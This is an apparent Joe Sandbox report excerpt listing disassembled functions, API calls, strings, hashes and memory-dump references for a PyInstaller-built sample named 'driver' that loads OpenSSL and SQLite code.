API String ID: 3896166516-3733052814
Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction ID: ca0e5d33da3e64865ddb7080a57a05894876cbec074985cacd0516a99a3c4712
Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction Fuzzy Hash: 7B517E3294928686EB748F26904437876A0FB55F98F144236EA9DC7B97CFBCE850E700

Function 00007FF6A29BEF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6A29BEFA7
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6A29BEFF3

Strings

MOC, xrefs: 00007FF6A29BEFBB
RCC, xrefs: 00007FF6A29BEFC3

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction ID: 3e645d1c7f53a3bc27edbec73665b6abc29c5937c1d24db6cad482e3f846c8a7
Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction Fuzzy Hash: 7B619372909BC585EB608B16E4403AAB7A0FB95F98F044635EB9D87B57DFBCD190CB00

Function 00007FF8A7F821E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A7F8220A
00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A7F82228

Strings

CJK UNIFIED IDEOGRAPH-, xrefs: 00007FF8A7F8221E
HANGUL SYLLABLE , xrefs: 00007FF8A7F82200

Memory Dump Source

Source File: 00000002.00000002.2446639595.00007FF8A7F81000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FF8A7F80000, based on PE: true

Associated: 00000002.00000002.2446587978.00007FF8A7F80000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A7FCA000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A7FD8000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A8027000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A802C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A802F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2447146577.00007FF8A8030000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2447206184.00007FF8A8032000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a7f80000_driver.jbxd

Similarity

API ID: 00007C6126570
String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
API String ID: 800424832-87138338
Opcode ID: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
Instruction ID: 4afbaeb7b79fdf24e804bcccc229a6dc61f0a3b6e4df06cc0e41a6bebb33b76e
Opcode Fuzzy Hash: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
Instruction Fuzzy Hash: 1E41D272B0EB4296F7608F38E844A7D6751FB90BE4F544230EA5947AD9EF3CE6019B40

Function 00007FF8A867FEF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 114COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A8680023

Strings

-, xrefs: 00007FF8A8680007
%!.15g, xrefs: 00007FF8A868006C
, xrefs: 00007FF8A8680042

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: $%!.15g$-
API String ID: 22509725-875264902
Opcode ID: 44e7bfd73146257976c8babe6df8ad74685d0057028d93717c232ee9119ed487
Instruction ID: af810600024a84f9f4a9e0e60dc85cdf7430a9d99424c808c0543feb027f0b03
Opcode Fuzzy Hash: 44e7bfd73146257976c8babe6df8ad74685d0057028d93717c232ee9119ed487
Instruction Fuzzy Hash: DF414562E1E78496FB10CB2EE004BAABBA0EB597C0F005135EE8E07796CB3CD005C750

Function 00007FF8A80419DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

00007FF8A8114D31.LIBCRYPTO-3 ref: 00007FF8A80821AB
00007FF8A8114D31.LIBCRYPTO-3 ref: 00007FF8A80821ED
00007FF8A8114D31.LIBCRYPTO-3 ref: 00007FF8A808222F

Strings

..\s\ssl\tls_srp.c, xrefs: 00007FF8A808229E, 00007FF8A80822B0

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: 00007A8114
String ID: ..\s\ssl\tls_srp.c
API String ID: 64304817-1778748169
Opcode ID: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
Instruction ID: 0d5c0607a8ed3aef549fd7895b44754f83dcd5701e36a13ee26d7389e0d7520a
Opcode Fuzzy Hash: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
Instruction Fuzzy Hash: 1F414121A0BA83A8FE54AF51955477872D0EF61FD4F180234DD6D0BBD9DF3CA4618638

Function 00007FF6A29B7E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF6A29B352C,?,00000000,00007FF6A29B3F23), ref: 00007FF6A29B7F22

Strings

%.*s, xrefs: 00007FF6A29B7EDB
%s%c, xrefs: 00007FF6A29B7E94
\, xrefs: 00007FF6A29B7E87

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
Instruction ID: 7e4cf7fcca1263ab1e9796fc657e1b1d4af76f9d141fe1bea4070a68a309b58f
Opcode Fuzzy Hash: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
Instruction Fuzzy Hash: E131C42265AAC145EB219B22E8507EA6354EF84FE8F441331EE6D877CBDFACD6019700

Function 00007FF6A29B2810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF6A29B28EA

Strings

Error, xrefs: 00007FF6A29B28DD
[PYI-%d:%ls] , xrefs: 00007FF6A29B2868
ERROR, xrefs: 00007FF6A29B286F

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction ID: 43608e3a7d71fbba694d0bce4705e405c754ceeee61d327d24f3a54586d0a28a
Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction Fuzzy Hash: 57219F62B09B4186E6109B66F4447EA63A4FB88B88F400136EE8D9365BDE7CE645D740

Function 00007FF6A29CC610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6A29CC68F
WriteFile.KERNEL32 ref: 00007FF6A29CC957
WriteFile.KERNEL32 ref: 00007FF6A29CC99D
GetLastError.KERNEL32 ref: 00007FF6A29CCA53

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction ID: cfa19f61f0802f777e62fdf0d77e5a8d80f18a55cbfcfb7aa0afd87f2970415e
Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction Fuzzy Hash: B7D10672B19A818EE710CF66D4442AC3BB1FB44F9CB448235DE5E97B9ADE78E006D340

Function 00007FF8A869DBA0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A869DC87
00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A869DCDB
00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A869DD37
00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A869DDB7

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID:
API String ID: 22509725-0
Opcode ID: c805bd562258d8df5866e84e3d87bde111353fec1875c4e7c43f0334e34767cb
Instruction ID: 98f092d95dff559eaf192feb61944a45dfc8a266beecbe82b28f60aa5b584708
Opcode Fuzzy Hash: c805bd562258d8df5866e84e3d87bde111353fec1875c4e7c43f0334e34767cb
Instruction Fuzzy Hash: 3C91D371A0BB46A6FAA49F1691482797F94FB44BE0F486234DE6D077C5EF3CE4108728

Function 00007FF6A29CCFD0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A29CCFBB), ref: 00007FF6A29CD0EC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A29CCFBB), ref: 00007FF6A29CD177

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction ID: 522a9567aabdbeb78e2da34d8e5744d7ad4773fd4d8039c6315a57bc8951ac28
Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction Fuzzy Hash: 6291D332F5A65289F754DF6694402BD2BA0BB44F8CF144139DE0E97B8ACEB8F452E710

Function 00007FF8A86B4180 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86B41F5
00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86B4219
00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86B4238
00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86B4250

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID:
API String ID: 22509725-0
Opcode ID: 2db2c3c66d5ac1fca2ba80e9efd88c0aaff962aced3a1b146ac441fe06bb1eef
Instruction ID: 2b39ed67ace99152adffe4ede80bade336e7c3c0ce98d629fc7a22a145ee3bc3
Opcode Fuzzy Hash: 2db2c3c66d5ac1fca2ba80e9efd88c0aaff962aced3a1b146ac441fe06bb1eef
Instruction Fuzzy Hash: CB21CE62B0A74297E6249B1AB5490BAB3A1FB44BC4F042131DBCE47F56CF3CE050C314

Function 00007FF6A29B20C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6A29B20F4
SetWindowLongPtrW.USER32 ref: 00007FF6A29B2116
GetWindowLongPtrW.USER32 ref: 00007FF6A29B2140
InvalidateRect.USER32 ref: 00007FF6A29B2160

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: 6ffdb0cf0d0221358e9fe882391256db85e4156b394c2f554441733715bd3c2c
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: E5110821F4D14282F654876BE5442BA5292EF98F88F888030DB4D87B8FCDBDE4C1B200

Function 00007FF8A80BECE0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF8A80BED0C
GetCurrentThreadId.KERNEL32 ref: 00007FF8A80BED1A
GetCurrentProcessId.KERNEL32 ref: 00007FF8A80BED26
QueryPerformanceCounter.KERNEL32 ref: 00007FF8A80BED36

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
Instruction ID: 33cb09135e44f660749d2e44278a44297bf1868f00aad6330e10399435591a66
Opcode Fuzzy Hash: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
Instruction Fuzzy Hash: D6113322B15F0199EF40CF60E8542B933A4FB19798F440E31DA5D86794EF78D5B88354

Function 00007FF8A7F82E0C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF8A7F82E38
GetCurrentThreadId.KERNEL32 ref: 00007FF8A7F82E46
GetCurrentProcessId.KERNEL32 ref: 00007FF8A7F82E52
QueryPerformanceCounter.KERNEL32 ref: 00007FF8A7F82E62

Memory Dump Source

Source File: 00000002.00000002.2446639595.00007FF8A7F81000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FF8A7F80000, based on PE: true

Associated: 00000002.00000002.2446587978.00007FF8A7F80000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A7FCA000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A7FD8000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A8027000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A802C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A802F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2447146577.00007FF8A8030000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2447206184.00007FF8A8032000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a7f80000_driver.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
Instruction ID: 41877da23c691756722807e8729d9cfdf5c254a80d957d8ee69900fc3e724515
Opcode Fuzzy Hash: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
Instruction Fuzzy Hash: 2C111826B16B019AFB008F70E8556A833A4FB197A8F440A31DA6D467A4EF78D1688344

Function 00007FF6A29BD080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6A29BD0AC
GetCurrentThreadId.KERNEL32 ref: 00007FF6A29BD0BA
GetCurrentProcessId.KERNEL32 ref: 00007FF6A29BD0C6
QueryPerformanceCounter.KERNEL32 ref: 00007FF6A29BD0D6

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction ID: ca73135a5ee42049fd0ae0ae2ebb798455ef37b71fe5550840e41bc44283277c
Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction Fuzzy Hash: AF114836B59B068AFB00CB61E8542B933A4FB19B58F040E35DA6D867A9DFB8D1549340

Function 00007FF8A868DD14 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 290COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A868E0A1

Strings

out of memory, xrefs: 00007FF8A8692508
string or blob too big, xrefs: 00007FF8A8692193

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: out of memory$string or blob too big
API String ID: 22509725-2410398255
Opcode ID: 5081886879a1dcb09f1a8e8b481931c42fe165402a51258c3fdd95875b174ecb
Instruction ID: 1376e50694f6ecdca36b2f1247cdf7ca32d4d077220f1ebcac3e2aca4c9828ac
Opcode Fuzzy Hash: 5081886879a1dcb09f1a8e8b481931c42fe165402a51258c3fdd95875b174ecb
Instruction Fuzzy Hash: 15C1E262F0A642A2FB249A25D58827C6BE0EF11BC4F046436CB4E577D5FF2CE4528338

Function 00007FF8A8041A05 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 283COMMON

Download Yara Rule

APIs

00007FF8C61208A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8A8050C5B

Strings

d2i_SSL_SESSION, xrefs: 00007FF8A8050AC2, 00007FF8A8050B47, 00007FF8A8050B88, 00007FF8A8050DA2
..\s\ssl\ssl_asn1.c, xrefs: 00007FF8A8050ACE, 00007FF8A8050B53, 00007FF8A8050B94, 00007FF8A8050D34, 00007FF8A8050DAE, 00007FF8A8050DFA, 00007FF8A8050E6F

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: 00007C61208
String ID: ..\s\ssl\ssl_asn1.c$d2i_SSL_SESSION
